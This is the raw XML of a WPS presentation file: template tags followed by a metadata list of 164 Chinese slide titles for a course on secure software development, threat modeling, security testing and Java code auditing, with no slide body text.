  <p:tag name="KSO_WM_UNIT_INDEX" val="1_4_1"/>
  <p:tag name="KSO_WM_DIAGRAM_VERSION" val="3"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TRICK" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TEXT_CAN_REMOVE" val="n"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT" val="单击此处添加目录项标题"/>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2_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231821"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_SUBTYPE" val="d"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="l_h_i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_2_1"/>
  <p:tag name="KSO_WM_DIAGRAM_VERSION" val="3"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TRICK" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TEXT_CAN_REMOVE" val="n"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT" val="02"/>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3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="PA" val="v3.0.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a*1_2_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231821"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_UNIT_ISCONTENTSTITLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_ISNUMDGMTITLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_NOCLEAR" val="0"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="l_h_a"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_2_1"/>
  <p:tag name="KSO_WM_DIAGRAM_VERSION" val="3"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TRICK" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TEXT_CAN_REMOVE" val="n"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT" val="单击此处添加目录项标题"/>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3_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231821"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>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4_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231821"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="l_h_i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_4_2"/>
  <p:tag name="KSO_WM_DIAGRAM_VERSION" val="3"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TRICK" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TEXT_CAN_REMOVE" val="n"/>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3_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231821"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_SUBTYPE" val="d"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="l_h_i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_3_1"/>
  <p:tag name="KSO_WM_DIAGRAM_VERSION" val="3"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TRICK" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TEXT_CAN_REMOVE" val="n"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT" val="03"/>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a*1_3_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231821"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_UNIT_ISCONTENTSTITLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_ISNUMDGMTITLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_NOCLEAR" val="0"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="l_h_a"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_3_1"/>
  <p:tag name="KSO_WM_DIAGRAM_VERSION" val="3"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TRICK" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TEXT_CAN_REMOVE" val="n"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT" val="单击此处添加目录项标题"/>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4_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231821"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_SUBTYPE" val="d"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="l_h_i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_4_1"/>
  <p:tag name="KSO_WM_DIAGRAM_VERSION" val="3"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TRICK" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TEXT_CAN_REMOVE" val="n"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT" val="04"/>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a*1_4_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231821"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_UNIT_ISCONTENTSTITLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_ISNUMDGMTITLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_NOCLEAR" val="0"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="l_h_a"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_4_1"/>
  <p:tag name="KSO_WM_DIAGRAM_VERSION" val="3"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TRICK" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TEXT_CAN_REMOVE" val="n"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT" val="单击此处添加目录项标题"/>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4_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231821"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="l_h_i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_4_2"/>
  <p:tag name="KSO_WM_DIAGRAM_VERSION" val="3"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TRICK" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TEXT_CAN_REMOVE" val="n"/>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4_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231821"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_SUBTYPE" val="d"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="l_h_i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_4_1"/>
  <p:tag name="KSO_WM_DIAGRAM_VERSION" val="3"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TRICK" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TEXT_CAN_REMOVE" val="n"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT" val="04"/>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a*1_4_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231821"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_UNIT_ISCONTENTSTITLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_ISNUMDGMTITLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_NOCLEAR" val="0"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="l_h_a"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_4_1"/>
  <p:tag name="KSO_WM_DIAGRAM_VERSION" val="3"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TRICK" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TEXT_CAN_REMOVE" val="n"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT" val="单击此处添加目录项标题"/>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4.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="PA" val="v3.0.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4_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231821"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="l_h_i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_4_2"/>
  <p:tag name="KSO_WM_DIAGRAM_VERSION" val="3"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TRICK" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TEXT_CAN_REMOVE" val="n"/>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i*1_4_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231821"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_SUBTYPE" val="d"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="l_h_i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_4_1"/>
  <p:tag name="KSO_WM_DIAGRAM_VERSION" val="3"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TRICK" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TEXT_CAN_REMOVE" val="n"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT" val="04"/>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6*l_h_a*1_4_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="custom"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20231821"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="3.0"/>
  <p:tag name="KSO_WM_UNIT_ISCONTENTSTITLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_ISNUMDGMTITLE" val="0"/>
  <p:tag name="KSO_WM_UNIT_NOCLEAR" val="0"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_UNIT_TYPE" val="l_h_a"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1_4_1"/>
  <p:tag name="KSO_WM_DIAGRAM_VERSION" val="3"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TRICK" val="1"/>
  <p:tag name="KSO_WM_DIAGRAM_COLOR_TEXT_CAN_REMOVE" val="n"/>
  <p:tag name="KSO_WM_UNIT_PRESET_TEXT" val="单击此处添加目录项标题"/>
  <p:tag name="KSO_WM_DIAGRAM_MAX_ITEMCNT" val="6"/>
  <p:tag name="KSO_WM_DIAGRAM_MIN_ITEMCNT" val="2"/>
  <p:tag name="KSO_WM_DIAGRAM_VIRTUALLY_FRAME" val="{&quot;height&quot;:285.1888177586353,&quot;left&quot;:-6.472362204724409,&quot;top&quot;:203.46251968503935,&quot;width&quot;:981.6448031496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43.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="commondata" val="eyJoZGlkIjoiYjQxOThjMjljNTA5M2NkMjU4ODQwYWMyY2I5MzkzN2QifQ=="/>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33195</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>2066</Paragraphs>
  <Slides>164</Slides>
  <Notes>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164</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="175" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>sans-serif</vt:lpstr>
      <vt:lpstr>Segoe Print</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>WPS</vt:lpstr>
      <vt:lpstr>web security</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>软件安全开发生命周期</vt:lpstr>
      <vt:lpstr>软件生命周期模型</vt:lpstr>
      <vt:lpstr>软件生命周期模型-瀑布模型</vt:lpstr>
      <vt:lpstr>软件生命周期模型-瀑布模型</vt:lpstr>
      <vt:lpstr>软件生命周期模型-迭代模型</vt:lpstr>
      <vt:lpstr>软件生命周期模型-增量模型</vt:lpstr>
      <vt:lpstr>其他软件开发方法</vt:lpstr>
      <vt:lpstr>软件生命周期模型-螺旋模型</vt:lpstr>
      <vt:lpstr>其他软件开发方法</vt:lpstr>
      <vt:lpstr>软件安全重要性-软件危机</vt:lpstr>
      <vt:lpstr>软件安全问题产生--软件缺陷普遍存在</vt:lpstr>
      <vt:lpstr>软件安全问题产生-内因</vt:lpstr>
      <vt:lpstr>软件安全问题产生-外因</vt:lpstr>
      <vt:lpstr>软件安全保障</vt:lpstr>
      <vt:lpstr>软件安全开发生命周期</vt:lpstr>
      <vt:lpstr>软件安全问题越早解决成本越低</vt:lpstr>
      <vt:lpstr>相关模型和研究</vt:lpstr>
      <vt:lpstr>SDL</vt:lpstr>
      <vt:lpstr>SDL的阶段和安全活动</vt:lpstr>
      <vt:lpstr>SDL实施效果</vt:lpstr>
      <vt:lpstr>CLASP</vt:lpstr>
      <vt:lpstr>CMMI</vt:lpstr>
      <vt:lpstr>SAMM</vt:lpstr>
      <vt:lpstr>SAMM</vt:lpstr>
      <vt:lpstr>BSI系列模型</vt:lpstr>
      <vt:lpstr>BSIMM</vt:lpstr>
      <vt:lpstr>各模型比较</vt:lpstr>
      <vt:lpstr>威胁建模</vt:lpstr>
      <vt:lpstr>威胁建模流程</vt:lpstr>
      <vt:lpstr>威胁建模-确定对象</vt:lpstr>
      <vt:lpstr>威胁建模-确定对象</vt:lpstr>
      <vt:lpstr>威胁建模-识别威胁</vt:lpstr>
      <vt:lpstr>理解STRIDE六类威胁</vt:lpstr>
      <vt:lpstr>威胁建模-评估威胁</vt:lpstr>
      <vt:lpstr>威胁建模-消减威胁</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>安全需求分析</vt:lpstr>
      <vt:lpstr>需求分析过程</vt:lpstr>
      <vt:lpstr>安全设计的重要性</vt:lpstr>
      <vt:lpstr>软件安全设计</vt:lpstr>
      <vt:lpstr>安全设计的主要活动</vt:lpstr>
      <vt:lpstr>安全设计原则</vt:lpstr>
      <vt:lpstr>最小特权原则</vt:lpstr>
      <vt:lpstr>权限分离</vt:lpstr>
      <vt:lpstr>最小共享</vt:lpstr>
      <vt:lpstr>完全中立</vt:lpstr>
      <vt:lpstr>心理可接受度</vt:lpstr>
      <vt:lpstr>默认故障</vt:lpstr>
      <vt:lpstr>纵深防御</vt:lpstr>
      <vt:lpstr>公开设计</vt:lpstr>
      <vt:lpstr>降低攻击面</vt:lpstr>
      <vt:lpstr>分析软件攻击面</vt:lpstr>
      <vt:lpstr>降低攻击面策略</vt:lpstr>
      <vt:lpstr>降低软件攻击面通常做法</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>通用安全编码原则-验证输入</vt:lpstr>
      <vt:lpstr>验证输入-常见输入源</vt:lpstr>
      <vt:lpstr>通用安全编码原则-避免缓冲区溢出</vt:lpstr>
      <vt:lpstr>通用编码原则-避免缓冲区溢出</vt:lpstr>
      <vt:lpstr>通用编码原则-程序内部安全</vt:lpstr>
      <vt:lpstr>通用编码原则-程序内部安全</vt:lpstr>
      <vt:lpstr>通用编码原则-安全调用组件</vt:lpstr>
      <vt:lpstr>通用编码原则-安全调用组件</vt:lpstr>
      <vt:lpstr>通用编码原则-禁用不安全函数</vt:lpstr>
      <vt:lpstr>软件安全编译</vt:lpstr>
      <vt:lpstr>源代码审核</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>软件测试</vt:lpstr>
      <vt:lpstr>软件测试的基本概念</vt:lpstr>
      <vt:lpstr>软件测试方法/阶段</vt:lpstr>
      <vt:lpstr>软件测试阶段-出厂测试</vt:lpstr>
      <vt:lpstr>软件测试阶段-单元测试</vt:lpstr>
      <vt:lpstr>软件测试阶段-集成测试</vt:lpstr>
      <vt:lpstr>软件测试阶段-系统测试</vt:lpstr>
      <vt:lpstr>软件测试阶段-系统集成测试</vt:lpstr>
      <vt:lpstr>软件测试阶段-回归测试</vt:lpstr>
      <vt:lpstr>软件测试阶段-验收测试</vt:lpstr>
      <vt:lpstr>软件测试阶段-生产接受测试</vt:lpstr>
      <vt:lpstr>软件测试方法-黑盒测试</vt:lpstr>
      <vt:lpstr>软件测试方法-白盒测试</vt:lpstr>
      <vt:lpstr>软件测试方法-灰盒测试</vt:lpstr>
      <vt:lpstr>软件安全测试</vt:lpstr>
      <vt:lpstr>软件安全测试方法</vt:lpstr>
      <vt:lpstr>模糊测试（Fuzzing）</vt:lpstr>
      <vt:lpstr>模糊测试</vt:lpstr>
      <vt:lpstr>模糊测试</vt:lpstr>
      <vt:lpstr>影响模糊测试效果的关键因素</vt:lpstr>
      <vt:lpstr>渗透测试</vt:lpstr>
      <vt:lpstr>渗透测试流程</vt:lpstr>
      <vt:lpstr>渗透测试要点</vt:lpstr>
      <vt:lpstr>灵活安排自己的“组合”</vt:lpstr>
      <vt:lpstr>软件安全测试思路</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>软件供应链安全</vt:lpstr>
      <vt:lpstr>软件验收及部署</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>案例分析</vt:lpstr>
      <vt:lpstr>案例分析 </vt:lpstr>
      <vt:lpstr>案例分析 </vt:lpstr>
      <vt:lpstr>案例分析 </vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>代码审计</vt:lpstr>
      <vt:lpstr>代码审计</vt:lpstr>
      <vt:lpstr>代码审计</vt:lpstr>
      <vt:lpstr>代码审计-Java进阶</vt:lpstr>
      <vt:lpstr>代码审计-Java进阶</vt:lpstr>
      <vt:lpstr>代码审计-Java进阶</vt:lpstr>
      <vt:lpstr>代码审计-Java进阶</vt:lpstr>
      <vt:lpstr>代码审计-Java进阶</vt:lpstr>
      <vt:lpstr>代码审计-Java进阶</vt:lpstr>
      <vt:lpstr>代码审计-Java进阶</vt:lpstr>
      <vt:lpstr>代码审计-Java进阶</vt:lpstr>
      <vt:lpstr>代码审计-Java进阶</vt:lpstr>
      <vt:lpstr>代码审计-Java进阶</vt:lpstr>
      <vt:lpstr>代码审计-Java进阶</vt:lpstr>
      <vt:lpstr>代码审计-Java进阶</vt:lpstr>
      <vt:lpstr>代码审计-Java进阶</vt:lpstr>
      <vt:lpstr>代码审计-反序列化 </vt:lpstr>
      <vt:lpstr>代码审计-反序列化  </vt:lpstr>
      <vt:lpstr>代码审计-反序列化 </vt:lpstr>
      <vt:lpstr>代码审计-反序列化 </vt:lpstr>
      <vt:lpstr>代码审计-反序列化 </vt:lpstr>
      <vt:lpstr>代码审计-反序列化 </vt:lpstr>
      <vt:lpstr>代码审计-反序列化 </vt:lpstr>
      <vt:lpstr>代码审计-反序列化 </vt:lpstr>
      <vt:lpstr>代码审计-反序列化 </vt:lpstr>
      <vt:lpstr>代码审计-反序列化 </vt:lpstr>
      <vt:lpstr>代码审计-反序列化 </vt:lpstr>
      <vt:lpstr>代码审计-反序列化 </vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</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代码审计-源码分析</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85313</cp:lastModifiedBy>
  <cp:revision>1208</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-25T02:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-28T14:56:11Z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2052-12.1.0.17150</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>E42767E41DD54175B7B64A6C1414626D_12</vt:lpwstr>
  </property>
</Properties>
</file>